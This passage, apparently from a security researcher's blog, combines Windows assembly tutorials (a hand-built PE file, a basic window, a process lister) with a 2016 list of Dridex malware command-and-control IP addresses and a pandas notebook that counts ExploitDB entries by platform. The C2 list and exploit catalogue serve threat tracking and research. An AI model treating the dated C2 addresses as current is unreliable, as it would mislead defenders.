                                .Characteristic         dd      0x60000020      ;end   : 1C7 (455)
                        SECTION_3:
                                .Name                   dq      ‘.idata’        ;start : 1C8 (456)
                                .VirtualSize            dd      0x00000090
                                .VirtualAddress         dd      0x00003000      ;-> in memory, it is 403000
                                .SizeOfRawData          dd      0x00000200
                                .PointerToRawData       dd      0x00000600      ;-> in our file, it is 0x600 (1536) (offset from zero)
                                .PointerToRelocations   dd      0
                                .PointerToLineNumbers   dd      0
                                .NumberOfRelocations    dw      0
                                .NumberOfLineNumbers    dw      0
                                .Characteristic         dd      0x40000040      ;end   : 1EF (495)
;                                                                                                  |
;our SECTION_1 points at 0x200 or (512) bytes from zero             |
;since we are currently in file offset 1EF  ——————————————-+
;we need to “rb 0xF” or “rq 2” so that our address from 1F0 to 1FF are filled.
                                                        rq      2               ;start : 1F0 (496) to 1FF (511)
                        
                        ;file offset   = 0x200
                        ;memory offset = 0x401000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_1.VirtualAddress)
                        ;=========================================================================================
                        SECTION_1_RAW_DATA:                                     ;start : 200 (512) to 3FF (1023)
                        org 0x401000
                                msgText          db      ‘Message Text’,0       ;512 524 
                                                                                ;we use 1D (29) bytes here
                                msgCaption      db      ‘Message Caption’,0     ;;525 540
                                
                                ; 541 to 1023 should be filled
                                ; (1023 – 541) + 1 = 483 bytes
                                
                                ; we NEED to + 1 because 1023 is not INCLUDED when
                                ; we use it to minus 541.
                                rb      483                                     ;because our .code raw data start at 400 (1024)
                                                                                ;and because our IMAGE_OPTIONAL_HEADER > FileAlignment is 0x200 (512) bytes
                        ;file offset   = 0x400
                        ;memory offset = 0x402000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_2.VirtualAddress)
                        ;=========================================================================================
                        org 0x2000
                        SECTION_2_RAW_DATA:                                                     ;start : 400 (1024) to 5FF (1535)
                                use32                                                           ;we are using 32-bit instruction
                                push    0x40                    ;6A 40                          ;MB_OK + MB_ICONASTERIK + MB_APPLMODAL
                                push    msgCaption              ;68 0D 10 40 00                 ;push msgCaption
                                push    msgText                 ;68 00 00 40 00                 ;push msgText
                                push    0                       ;6A 00                          ;push HWND_DESKTOP
                                call    dword [0x0040307A]      ;FF 15 7A 30 40 00              ;call MessageBoxA
                                push    0                       ;6A 00                          ;push zero for ExitProcess parameter
                                call    dword [0x0040305C]      ;FF 15 5C 30 40 00              ;call ExitProcess
                                
                                ;we have used 1C (28) bytes here
                                ;1052 to 1535 should be filled
                                ;(1535 – 1052) + 1 = 484 bytes
                                rb      484
                        ;file offset   = 0x600
                        ;memory offset = 0x403000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_3.VirtualAddress)
                        ;=========================================================================================
                        org 0x3000
                        SECTION_3_RAW_DATA:                                             ;start : 600 (1536) to 7FF (2047)
                                IMAGE_IMPORT_DESCRIPTOR_1:
                                        .OriginalFirstThunk     dd      0x00003054      ;3000 3003
                                        .TimeDateStamp  dd      0                       ;3004 3007
                                        .ForwarderChain dd      0                       ;3008 300B
                                        .Name                   dd      0x0000303C      ;300C 300F
                                        .FirstThunk             dd      0x0000305C      ;3010 3013
                                IMAGE_IMPORT_DESCRIPTOR_2:
                                        .OriginalFirstThunk     dd      0x00003072      ;3014 3017
                                        .TimeDateStamp          dd      0               ;3018 301B
                                        .ForwarderChain         dd      0               ;301C 301F
                                        .Name                   dd      0x00003049      ;3020 3023
                                        .FirstThunk             dd      0x0000307A      ;3024 3027
                                
                                                ;terminated with IMAGE_IMPORT_DESCRIPTIOR that filled with 0 zeros
                                rd      5       ;the structure size of IMAGE_IMPORT_DESCRIPTOR
                                                                                        ;3028 to 303B
                                
                        ;Our DLL Name
                        .KERNEL32       db      ‘KERNEL32.DLL’,0                        ;303C to 3048
                        .USER32         db      ‘USER32.DLL’,0                          ;3049 to 3053
                        IMAGE_THUNK_DATA32_1:
                                .ForwarderString        dd      0x00003064              ;3054 3057
                                .Function               dd      0                       ;3058 305B
                                .Ordinal                dd      0x00003064              ;305C 305F
                                .AddressOfData          dd      0                       ;3060 3063
                                IMAGE_IMPORT_BY_NAME_1:
                                        .Hint           dw      0                       ;3064 3065
                                        .Name           db      ‘ExitProcess’,0         ;3066 3071
                        IMAGE_THUNK_DATA32_2:
                                .ForwarderString        dd      0x00003082              ;3072 3075
                                .Function               dd      0                       ;3076 3079
                                .Ordinal                dd      0x00003082              ;307A 307D
                                .AddressOfData          dd      0                       ;307E 3081
                                IMAGE_IMPORT_BY_NAME_2:
                                        .Hint           dw      0                       ;3082 3083
                                        .Name           db      ‘MessageBoxA’,0         ;3084 308F
                        ;308F = 143 bytes used
                        ;must filled 2047 – (1536 + 143) = 368 + 1 = 369 bytes
                        rb 367
                        db 0

Let’s Learn: Assembly –> Simple Window

Sourcehttps://win32assembly.programminghorizon.com/tut3.html

Theory:

Windows programs rely heavily on API functions for their GUI. This approach benefits both users and programmers. For users, they don’t have to learn how to navigate the GUI of each new programs, the GUI of Windows programs are alike. For programmers, the GUI codes are already there, tested, and ready for use. The downside for programmers is the increased complexity involved. In order to create or manipulate any GUI objects such as windows, menu or icons, programmers must follow a strict recipe. But that can be overcome by modular programming or OOP paradigm.

I’ll outline the steps required to create a window on the desktop below:

  1. Get the instance handle of your program (required)
  2. Get the command line (not required unless your program wants to process a command line)
  3. Register window class (required ,unless you use predefined window types, eg. MessageBox or a dialog box)
  4. Create the window (required)
  5. Show the window on the desktop (required unless you don’t want to show the window immediately)
  6. Refresh the client area of the window
  7. Enter an infinite loop, checking for messages from Windows
  8. If messages arrive, they are processed by a specialized function that is responsible for the window
  9. Quit program if the user closes the window
===============================================================
.386 
.model flat,stdcall 
option casemap:none 
include \masm32\include\windows.inc 
include \masm32\include\user32.inc 
includelib \masm32\lib\user32.lib            ; calls to functions in user32.lib and kernel32.lib 
include \masm32\include\kernel32.inc 
includelib \masm32\lib\kernel32.lib
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD

.DATA                     ; initialized data 
ClassName   db “SimpleWinClass”,0        ; the name of our window class 
AppName     db “Our First Window”,0        ; the name of our window

.DATA?                    ; Uninitialized data 
hInstance HINSTANCE ?     ; Instance handle of our program 
CommandLine LPSTR   ? 

.CODE                                   ; Here begins our code 
start: 
invoke GetModuleHandle, NULL            ; get the instance handle of our program. 
                                        ; Under Win32, hmodule==hinstance mov hInstance,eax 
mov hInstance,eax 
invoke GetCommandLine                   ; get the command line. You don’t have to call this function IF 
                                        ; your program doesn’t process the command line. 
mov CommandLine,eax 
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT        ; call the main function 
invoke ExitProcess, eax                                           ; quit our program. The exit code is returned in eax from WinMain.

WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD 
    LOCAL wc:WNDCLASSEX                                            ; create local variables on stack 
    LOCAL msg:MSG 
    LOCAL hwnd:HWND

    mov   wc.cbSize,SIZEOF WNDCLASSEX                   ; fill values in members of wc 
    mov   wc.style, CS_HREDRAW or CS_VREDRAW 
    mov   wc.lpfnWndProc, OFFSET WndProc 
    mov   wc.cbClsExtra,NULL 
    mov   wc.cbWndExtra,NULL 
    push  hInstance 
    pop   wc.hInstance 
    mov   wc.hbrBackground,COLOR_WINDOW+1 
    mov   wc.lpszMenuName,NULL 
    mov   wc.lpszClassName,OFFSET ClassName 
    invoke LoadIcon,NULL,IDI_APPLICATION 
    mov   wc.hIcon,eax 
    mov   wc.hIconSm,eax 
    invoke LoadCursor,NULL,IDC_ARROW 
    mov   wc.hCursor,eax 
    invoke RegisterClassEx, addr wc                       ; register our window class 
    invoke CreateWindowEx,NULL,\ 
                ADDR ClassName,\ 
                ADDR AppName,\ 
                WS_OVERLAPPEDWINDOW,\ 
                CW_USEDEFAULT,\ 
                CW_USEDEFAULT,\ 
                CW_USEDEFAULT,\ 
                CW_USEDEFAULT,\ 
                NULL,\ 
                NULL,\ 
                hInst,\ 
                NULL 
    mov   hwnd,eax 
    invoke ShowWindow, hwnd,CmdShow                         ; display our window on desktop 
    invoke UpdateWindow, hwnd                               ; refresh the client area

    .WHILE TRUE                                             ; Enter message loop 
                invoke GetMessage, ADDR msg,NULL,0,0 
                .BREAK .IF (!eax) 
                invoke TranslateMessage, ADDR msg 
                invoke DispatchMessage, ADDR msg 
   .ENDW 
    mov     eax,msg.wParam                                   ; return exit code in eax 
    ret 
WinMain endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM 
    .IF uMsg==WM_DESTROY                                    ; if the user closes our window 
        invoke PostQuitMessage,NULL             ; quit our application 
    .ELSE 
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam     ; Default message processing 
        ret 
    .ENDIF 
    xor eax,eax 
    ret 
WndProc endp

end start
===============================================================

Dridex Node Tracker

Author: Vitali Kremez
Goal: Track all Dridex nodes and ingest the data into Elasticsearch, Kibana, Logstash (ELK) instance
Sourcehttps://feodotracker.abuse.ch/

Steps:
(1) Obtain the feed data using the custom scraper “dridexloader.py”;
(2) Load the data to the MySQL database;
(3) Push to the data to Elasticsearch;
(4) Create custom dashboards for the data visualization

The most recent Dridex nodes from the malware feeds are as follows:

Time C2 malware
November 18th 2016; 13:35:55.000 188.126.72.179 Dridex
November 18th 2016; 05:55:13.000 174.37.216.226 Dridex
November 18th 2016; 05:55:13.000 166.78.144.68 Dridex
November 16th 2016; 13:54:38.000 54.235.86.173 Dridex
November 15th 2016; 09:53:22.000 193.136.97.4 Dridex
November 15th 2016; 09:53:22.000 93.122.165.54 Dridex
November 11th 2016; 09:09:04.000 149.210.158.54 Dridex
November 11th 2016; 09:09:04.000 87.254.45.29 Dridex
October 27th 2016; 06:19:59.000 210.2.86.72 Dridex
October 27th 2016; 06:19:59.000 162.243.47.192 Dridex
October 26th 2016; 07:06:32.000 46.101.10.156 Dridex
October 26th 2016; 07:06:32.000 120.138.18.110 Dridex
October 26th 2016; 07:06:32.000 198.20.239.21 Dridex
October 23rd 2016; 20:07:38.000 92.222.219.26 Dridex
September 29th 2016; 08:09:00.000 23.253.210.81 Dridex
September 27th 2016; 05:46:30.000 62.108.36.240 Dridex
September 27th 2016; 05:46:30.000 132.248.49.100 Dridex
September 27th 2016; 05:46:30.000 148.251.46.169 Dridex
September 15th 2016; 02:14:31.000 50.57.75.172 Dridex
September 15th 2016; 02:14:31.000 130.88.149.87 Dridex
September 6th 2016; 13:00:07.000 109.104.92.167 Dridex

Exploit SQL Database Workflow with Pandas and iPython

Author:  Vitali Kremez

  • This iPython notebook creates and explores a SQL database of all known public exploits.

Source:

  • pandas: A library with data structures and data analysis tools. 
  • IPython notebook: An interface for writing and sharing Python code, text, and plots.
  • SQLite: An self-contained, server-less database that’s easy to set-up and query from Pandas.
  • Plotly: A platform for publishing interactive graphs from Python to the web.



PHP has the largest number of exploits in the SQL database.
Function
:
(1) Creates and queries the SQL database with approx. 40,000 rows and 9 columns of public exploits;

(2) Creates a graph “Number of remote exploits by platform”;

[1] Windows OS has 3,340 remote exploits, the largest number of remote exploits in the SQL database.
[2] Linux OS has 825 remote exploits, the second largest number in the database

(3) Creates a graph “Number of webapps exploits by platform”;
[1] We have approx. 17,335 of PHP webapp exploitsthe largest number of webapp exploits in the SQL database.
[2] We have only 1,498 asp webapp exploits, the second largest number in the database.

(4) Creates a graph “Number of local exploits by platform”;
[1] We have 1,561 of local Windows exploitsthe largest number of local exploits in the SQL database.
[2] We have only 819 Linux local exploits, the second largest number in the database.

(5) Creates a graph “Number of Denial- of-Service (DOS) exploits by platform”;
[1] We have 2,845 of DOS Windows exploitsthe largest number of DOS exploits in the SQL database.
[2] We have only 603 Linux DOS exploits, the second largest number in the database.

(6) Creates a graph “Number of exploits by platform”;
[1] We have approx. 17,590 of PHP exploits, the largest number of exploits in the SQL database.
[2] We have only 603 Linux exploits, the second largest number in the database.

(7) Queries the SQL database for Windows exploits;
We have 7,921 Windows exploits in the database.


(8) Creates a graph “Number of exploits by date”;
We have the largest number of exploits developed in 2010 among other years.

Windows has the largest number of DOS exploits among other platforms.


Picture

In [39]:
import pandas as pd
from sqlalchemy import create_engine # database connection
import datetime as dt
from IPython.display import display
In [40]:
import plotly.plotly as py # interactive graphing
from plotly.graph_objs import Bar, Scatter, Marker, Layout
In [13]:
disk_engine = create_engine('sqlite:///ExploitDB.db') 
In [14]:
start = dt.datetime.now()
chunksize = 40000
j = 0
index_start = 1
In [15]:
for df in pd.read_csv('https://raw.githubusercontent.com/offensive-security/exploit-database/master/files.csv', chunksize=chunksize, iterator=True, encoding='utf-8'):

df.index += index_start

j+=1
print '{} seconds: completed {} rows'.format((dt.datetime.now() - start).seconds, j*chunksize)

df.to_sql('data', disk_engine, if_exists='append')
index_start = df.index[-1] + 1
4 seconds: completed 40000 rows
In [42]:
df = pd.read_sql_query('SELECT * FROM data', disk_engine)
print df
       index     id                                  file  \
0 1 1 platforms/windows/remote/1.c
1 2 2 platforms/windows/remote/2.c
2 3 3 platforms/linux/local/3.c
3 4 4 platforms/solaris/local/4.c
4 5 5 platforms/windows/remote/5.c
5 6 6 platforms/php/webapps/6.php
6 7 7 platforms/linux/remote/7.pl
7 8 8 platforms/linux/remote/8.c
8 9 9 platforms/windows/dos/9.c
9 10 10 platforms/linux/remote/10.c
10 11 37060 platforms/windows/dos/37060.html
11 12 11 platforms/linux/dos/11.c
12 13 12 platforms/linux/local/12.c
13 14 13 platforms/windows/dos/13.c
14 15 15 platforms/osx/local/15.c
15 16 16 platforms/linux/remote/16.c
16 17 17 platforms/windows/dos/17.pl
17 18 18 platforms/linux/remote/18.sh
18 19 19 platforms/linux/remote/19.c
19 20 20 platforms/windows/remote/20.txt
20 21 21 platforms/linux/local/21.c
21 22 22 platforms/windows/dos/22.c
22 23 23 platforms/windows/remote/23.c
23 24 24 platforms/linux/remote/24.c
24 25 25 platforms/linux/remote/25.c
25 26 26 platforms/linux/remote/26.sh
26 27 27 platforms/linux/remote/27.pl
27 28 28 platforms/windows/remote/28.c
28 29 29 platforms/bsd/local/29.c
29 30 30 platforms/windows/remote/30.pl
... ... ... ...
35465 35466 39213 platforms/php/webapps/39213.txt
35466 35467 39214 platforms/linux/local/39214.c
35467 35468 39215 platforms/windows/remote/39215.py
35468 35469 39216 platforms/windows/dos/39216.py
35469 35470 39217 platforms/linux/local/39217.c
35470 35471 39218 platforms/windows/remote/39218.html
35471 35472 39219 platforms/multiple/dos/39219.txt
35472 35473 39220 platforms/windows/dos/39220.txt
35473 35474 39221 platforms/win64/dos/39221.txt
35474 35475 39222 platforms/multiple/remote/39222.txt
35475 35476 39223 platforms/php/webapps/39223.txt
35476 35477 39224 platforms/hardware/remote/39224.py
35477 35478 39229 platforms/linux/dos/39229.cpp
35478 35479 39230 platforms/linux/local/39230.c
35479 35480 39231 platforms/asp/webapps/39231.py
35480 35481 39232 platforms/windows/dos/39232.txt
35481 35482 39233 platforms/windows/dos/39233.txt
35482 35483 39234 platforms/php/webapps/39234.py
35483 35484 39235 platforms/multiple/webapps/39235.txt
35484 35485 39236 platforms/multiple/webapps/39236.py
35485 35486 39237 platforms/php/webapps/39237.txt
35486 35487 39238 platforms/php/webapps/39238.txt
35487 35488 39239 platforms/php/webapps/39239.txt
35488 35489 39240 platforms/php/webapps/39240.txt
35489 35490 39242 platforms/windows/dos/39242.py
35490 35491 39243 platforms/php/webapps/39243.txt
35491 35492 39244 platforms/linux/local/39244.txt
35492 35493 39245 platforms/php/webapps/39245.txt
35493 35494 39246 platforms/php/webapps/39246.txt
35494 35495 39248 platforms/php/webapps/39248.txt

description date \
0 Microsoft Windows WebDAV - (ntdll.dll) Remote ... 2003-03-23
1 Microsoft Windows WebDAV - Remote PoC Exploit 2003-03-24
2 Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local R... 2003-03-30
3 Sun SUNWlldap Library Hostname - Buffer Overfl... 2003-04-01
4 Microsoft Windows RPC Locator Service - Remote... 2003-04-03
5 WordPress <= 2.0.2 - (cache) Remote Shell Inje... 2006-05-25
6 Samba 2.2.x - Remote Root Buffer Overflow Exploit 2003-04-07
7 SETI@home Clients - Buffer Overflow Exploit 2003-04-08
8 Apache HTTP Server 2.x Memory Leak Exploit 2003-04-09
9 Samba <= 2.2.8 - Remote Root Exploit 2003-04-10
10 Microsoft Internet Explorer 11 - Crash PoC 2015-05-19
11 Apache <= 2.0.44 (Linux) - Remote Denial of Se... 2003-04-11
12 Linux Kernel < 2.4.20 - Module Loader Local Ro... 2003-04-14
13 Chindi Server 1.0 - Denial of Service Exploit 2003-04-18
14 Mac OS X <= 10.2.4 DirectoryService (PATH) Loc... 2003-04-18
15 PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit 2003-04-18
16 Xeneo Web Server 2.2.9.0 - Denial of Service E... 2003-04-22
17 Snort <= 1.9.1 - Remote Root Exploit (p7snort1... 2003-04-23
18 PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit ... 2003-04-25
19 Microsoft Windows SMB - Authentication Remote ... 2003-04-25
20 Qpopper 4.0.x - poppassd Local Root Exploit 2003-04-29
21 Pi3Web 2.0.1 - Denial of Service - Proof of Co... 2003-04-29
22 Real Server < 8.0.2 - Remote Exploit (Windows ... 2003-04-30
23 Sendmail <= 8.12.8 prescan() BSD Remote Root E... 2003-04-30
24 OpenSSH/PAM <= 3.6.1p1 - Remote Users Discover... 2003-04-30
25 OpenSSH/PAM <= 3.6.1p1 - Remote Users Ident (g... 2003-05-02
26 CommuniGate Pro Webmail 4.0.6 Session Hijackin... 2003-05-05
27 Kerio Personal Firewall 2.1.4 - Remote Code Ex... 2003-05-08
28 Firebird 1.0.2 FreeBSD 4.7-RELEASE - Local Roo... 2003-05-12
29 Snitz Forums 3.3.03 - Remote Command Execution... 2003-05-12
... ... ...
35465 WordPress Featured Comments Plugin Cross Site ... 2014-06-10
35466 Linux Kernel <= 3.3.5 '/drivers/media/media-de... 2014-05-28
35467 Konica Minolta FTP Utility 1.00 - CWD Command ... 2016-01-11
35468 KeePass Password Safe Classic 1.29 - Crash PoC 2016-01-11
35469 Amanda <= 3.3.1 - Local Root Exploit 2016-01-11
35470 TrendMicro node.js HTTP Server Listening on lo... 2016-01-11
35471 Adobe Flash BlurFilter Processing - Out-of-Bou... 2016-01-11
35472 Adobe Flash - Use-After-Free When Rendering Di... 2016-01-11
35473 Adobe Flash - Use-After-Free When Setting Stage 2016-01-11
35474 Foreman Smart-Proxy Remote Command Injection V... 2014-06-05
35475 ZeusCart 'prodid' Parameter SQL Injection Vuln... 2014-06-24
35476 FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor 2016-01-12
35477 Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - Imag... 2016-01-12
35478 Linux Kernel overlayfs - Local Privilege Escal... 2016-01-12
35479 WhatsUp Gold 16.3 - Unauthenticated Remote Cod... 2016-01-13
35480 Microsoft Windows devenum.dll!DeviceMoniker::L... 2016-01-13
35481 Microsoft Office / COM Object DLL Planting wit... 2016-01-13
35482 SevOne NMS <= 5.3.6.0 - Remote Root Exploit 2016-01-14
35483 Manage Engine Applications Manager 12 - Multip... 2016-01-14
35484 Manage Engine Application Manager 12.5 - Arbit... 2016-01-14
35485 WordPress NextGEN Gallery <= 1.9.1 'photocrati... 2014-05-19
35486 AtomCMS SQL Injection and Arbitrary File Uploa... 2014-07-07
35487 xClassified 'ads.php' SQL Injection Vulnerability 2014-07-07
35488 WordPress BSK PDF Manager Plugin 'wp-admin/adm... 2014-07-09
35489 NetSchedScan 1.0 - Crash PoC 2016-01-15
35490 phpDolphin <= 2.0.5 - Multiple Vulnerabilities 2016-01-15
35491 Amanda <= 3.3.1 - amstar Command Injection Loc... 2016-01-15
35492 Roundcube 1.1.3 - Path Traversal Vulnerability 2016-01-15
35493 mcart.xls Bitrix Module 6.5.2 - SQL Injection ... 2016-01-15
35494 WordPress BSK PDF Manager Plugin 'wp-admin/adm... 2014-07-09

author platform type port
0 kralor windows remote 80
1 RoMaNSoFt windows remote 80
2 Wojciech Purczynski linux local 0
3 Andi solaris local 0
4 Marcin Wolak windows remote 139
5 rgod php webapps 0
6 H D Moore linux remote 139
7 zillion linux remote 0
8 Matthew Murphy windows dos 0
9 eSDee linux remote 139
10 Garage4Hackers windows dos 0
11 Daniel Nystram linux dos 0
12 KuRaK linux local 0
13 Luca Ercoli windows dos 0
14 Neeko Oni osx local 0
15 einstein linux remote 1723
16 Tom Ferris windows dos 0
17 truff linux remote 0
18 blightninjas linux remote 1723
19 Haamed Gheibi windows remote 139
20 Xpl017Elz linux local 0
21 aT4r windows dos 0
22 Johnny Cyberpunk windows remote 554
23 bysin linux remote 25
24 Maurizio Agazzini linux remote 0
25 Nicolas Couture linux remote 0
26 Yaroslav Polyakov linux remote 80
27 Burebista windows remote 0
28 bob bsd local 0
29 None windows remote 0
... ... ... ... ...
35465 Tom Adams php webapps 0
35466 Salva Peiro linux local 0
35467 TOMIWA windows remote 21
35468 Mohammad Reza Espargham windows dos 0
35469 Hacker Fantastic linux local 0
35470 Google Security Research windows remote 0
35471 Google Security Research multiple dos 0
35472 Google Security Research windows dos 0
35473 Google Security Research win64 dos 0
35474 Lukas Zapletal multiple remote 0
35475 Kenny Mathis php webapps 0
35476 operator8203 hardware remote 22
35477 Stelios Tsampas linux dos 0
35478 halfdog linux local 0
35479 Matt Buzanowski asp webapps 0
35480 Google Security Research windows dos 0
35481 Google Security Research windows dos 0
35482 @iamsecurity php webapps 80
35483 Bikramaditya Guha multiple webapps 9090
35484 Bikramaditya Guha multiple webapps 0
35485 SANTHO php webapps 0
35486 Jagriti Sahu php webapps 0
35487 Lazmania61 php webapps 0
35488 Claudio Viviani php webapps 0
35489 Abraham Espinosa windows dos 0
35490 WhiteCollarGroup php webapps 80
35491 Hacker Fantastic linux local 0
35492 High-Tech Bridge SA php webapps 80
35493 High-Tech Bridge SA php webapps 80
35494 Claudio Viviani php webapps 0

[35495 rows x 9 columns]
In [ ]:
 
In [18]:
df = pd.read_sql_query("SELECT platform, COUNT(*) as 'num_remote' FROM data WHERE type LIKE '%remote%' GROUP BY platform ORDER BY 'num_remote'", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_remote)], filename='Number of remote exploits by platform')
In [20]:
df = pd.read_sql_query("SELECT platform, COUNT(*) as 'num_webapps' FROM data WHERE type LIKE '%webapps%' GROUP BY platform ORDER BY 'num_webapps'", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_webapps)], filename='Number of webapps exploits by platform')
In [21]:
df = pd.read_sql_query("SELECT platform, COUNT(*) as 'num_local' FROM data WHERE type LIKE '%local%' GROUP BY platform ORDER BY 'num_local'", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_local)], filename='Number of local exploits by platform')
In [22]:
df = pd.read_sql_query("SELECT platform, COUNT(*) as 'num_dos' FROM data WHERE type LIKE '%dos%' GROUP BY platform ORDER BY 'num_dos'", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_dos)], filename='Number of dos exploits by platform')
In [24]:
df = pd.read_sql_query("SELECT platform, COUNT(*) as 'num_exploits' FROM data GROUP BY platform ORDER BY 'num_exploits'", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_exploits)], filename='Number of exploits by platform')
In [35]:
df = pd.read_sql_query("SELECT platform, COUNT(*) as 'num_exploits' FROM data GROUP BY platform ORDER BY 'num_exploits'", disk_engine)
In [36]:
print df
          platform  num_exploits
0 aix 84
1 android 46
2 arm 15
3 asp 1508
4 atheos 1
5 beos 4
6 bsd 89
7 bsd_ppc 1
8 bsd_x86 14
9 bsdi_x86 3
10 cfm 56
11 cgi 692
12 freebsd 80
13 freebsd_x86 19
14 freebsd_x86-64 2
15 generator 9
16 hardware 1103
17 hp-ux 43
18 immunix 2
19 ios 135
20 irix 60
21 java 117
22 jsp 216
23 lin_amd64 9
24 lin_x86 230
25 lin_x86-64 28
26 linux 2352
27 linux_mips 9
28 linux_ppc 4
29 linux_sparc 2
.. ... ...
31 mips 2
32 multiple 1949
33 netbsd_x86 10
34 netware 16
35 novell 39
36 openbsd 18
37 openbsd_x86 3
38 osx 273
39 osx_ppc 11
40 palm_os 5
41 perl 3
42 php 17590
43 plan9 1
44 python 4
45 qnx 10
46 sco 38
47 sco_x86 1
48 sh4 3
49 solaris 190
50 solaris_sparc 11
51 solaris_x86 10
52 system_z 1
53 tru64 6
54 ultrix 2
55 unix 304
56 unixware 4
57 win32 102
58 win64 16
59 windows 7921
60 xml 17

[61 rows x 2 columns]
In [16]:
df = pd.read_sql_query("SELECT file, COUNT(*) as 'num_windows' FROM data WHERE file LIKE '%windows%' GROUP BY file ORDER BY 'num_windows'", disk_engine)
In [17]:
print df
                                      file  num_windows
0 platforms/windows/dos/1000.cpp 5
1 platforms/windows/dos/10005.py 5
2 platforms/windows/dos/10062.py 5
3 platforms/windows/dos/10068.rb 5
4 platforms/windows/dos/10073.py 5
5 platforms/windows/dos/10091.txt 5
6 platforms/windows/dos/10092.txt 5
7 platforms/windows/dos/10100.py 5
8 platforms/windows/dos/10102.pl 5
9 platforms/windows/dos/10103.txt 5
10 platforms/windows/dos/10104.py 5
11 platforms/windows/dos/10106.c 5
12 platforms/windows/dos/10160.py 5
13 platforms/windows/dos/10163.pl 5
14 platforms/windows/dos/10164.c 5
15 platforms/windows/dos/10171.py 5
16 platforms/windows/dos/10176.txt 5
17 platforms/windows/dos/10190.txt 5
18 platforms/windows/dos/10204.txt 5
19 platforms/windows/dos/10208.txt 5
20 platforms/windows/dos/10210.txt 5
21 platforms/windows/dos/10221.txt 5
22 platforms/windows/dos/10223.txt 5
23 platforms/windows/dos/1024.html 5
24 platforms/windows/dos/1025.html 5
25 platforms/windows/dos/10257.py 5
26 platforms/windows/dos/1027.c 5
27 platforms/windows/dos/10303.py 5
28 platforms/windows/dos/10333.py 5
29 platforms/windows/dos/10343.txt 5
... ... ...
7891 platforms/windows/webapps/31994.txt 5
7892 platforms/windows/webapps/31995.txt 5
7893 platforms/windows/webapps/33330.txt 5
7894 platforms/windows/webapps/33428.py 5
7895 platforms/windows/webapps/33434.rb 5
7896 platforms/windows/webapps/33633.txt 5
7897 platforms/windows/webapps/34527.c 5
7898 platforms/windows/webapps/34817.rb 5
7899 platforms/windows/webapps/34852.txt 5
7900 platforms/windows/webapps/34924.txt 5
7901 platforms/windows/webapps/35039.rb 5
7902 platforms/windows/webapps/35529.txt 5
7903 platforms/windows/webapps/35593.txt 5
7904 platforms/windows/webapps/35982.txt 5
7905 platforms/windows/webapps/36262.txt 5
7906 platforms/windows/webapps/36580.rb 5
7907 platforms/windows/webapps/36861.txt 5
7908 platforms/windows/webapps/36960.txt 5
7909 platforms/windows/webapps/37059.html 5
7910 platforms/windows/webapps/37319.html 5
7911 platforms/windows/webapps/37320.html 5
7912 platforms/windows/webapps/37395.txt 5
7913 platforms/windows/webapps/37621.txt 5
7914 platforms/windows/webapps/38379.txt 5
7915 platforms/windows/webapps/38380.txt 5
7916 platforms/windows/webapps/38602.txt 5
7917 platforms/windows/webapps/38762.txt 5
7918 platforms/windows/webapps/38822.rb 5
7919 platforms/windows/webapps/9873.txt 5
7920 platforms/windows/webapps/9885.txt 5

[7921 rows x 2 columns]
In [38]:
df = pd.read_sql_query("SELECT date, COUNT(*) as 'num_exploit' FROM data GROUP BY date ORDER BY 'num_exploit'", disk_engine)
py.iplot([Bar(x=df.date, y=df.num_exploit)], filename='Number of exploits by date')

Let’s Code: WIN32 MASM Process List Program

ShowProcess PROTO pid:DWORD
 
Core Functions
I. mov pbuf, ptr$(buffer)                          ; cast buffer address to a pointer

    invoke EnumProcesses,pbuf,4096,ADDR breq        ; enumerate processes
    shr breq, 2                                     ; get process cou​

II. invoke ShowProcess,[esi]

III.  mov hProcess, rv(OpenProcess,PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,FALSE,pid)
 .if hProcess != 0
      .if rv(EnumProcessModules,hProcess,ADDR hMod,4,ADDR cbNeeded) != 0
        invoke GetModuleBaseName,hProcess,hMod,pbuf,260
        mov ptxt, cat$(ptxt,”pid “,str$(pid),” “,pbuf)
      .else
        mov ptxt, cat$(ptxt,”pid “,str$(pid),” -fail- EnumProcessModules”)
      .endif
    .else
      mov ptxt, cat$(ptxt,”pid “,str$(pid),” -fail- OpenProcess”)
    .endif

Core Library
include \masm32\include\psapi.inc
includelib \masm32\lib\psapi.lib

Picture

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
    include \masm32\include\masm32rt.inc
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

comment * —————————————————–
                        List of All Processes and Its PIDs
        —————————————————– *

    include \masm32\include\psapi.inc
    includelib \masm32\lib\psapi.lib

    ShowProcess PROTO pid:DWORD

    .code

start:
 
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

    call main
    inkey
    exit

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

main proc

    LOCAL breq  :DWORD
    LOCAL pbuf  :DWORD
    LOCAL buffer[4096]:BYTE

    push esi
    push edi

    mov pbuf, ptr$(buffer)                          ; cast buffer address to a pointer

    invoke EnumProcesses,pbuf,4096,ADDR breq        ; enumerate processes
    shr breq, 2                                     ; get process count

    mov esi, pbuf
    mov edi, breq

  @@:
    invoke ShowProcess,[esi]
    add esi, 4
    sub edi, 1
    jnz @B

    pop edi
    pop esi

    ret

main endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

ShowProcess proc pid:DWORD

    LOCAL hProcess  :DWORD
    LOCAL hMod      :DWORD
    LOCAL cbNeeded  :DWORD
    LOCAL pbuf      :DWORD
    LOCAL ptxt      :DWORD
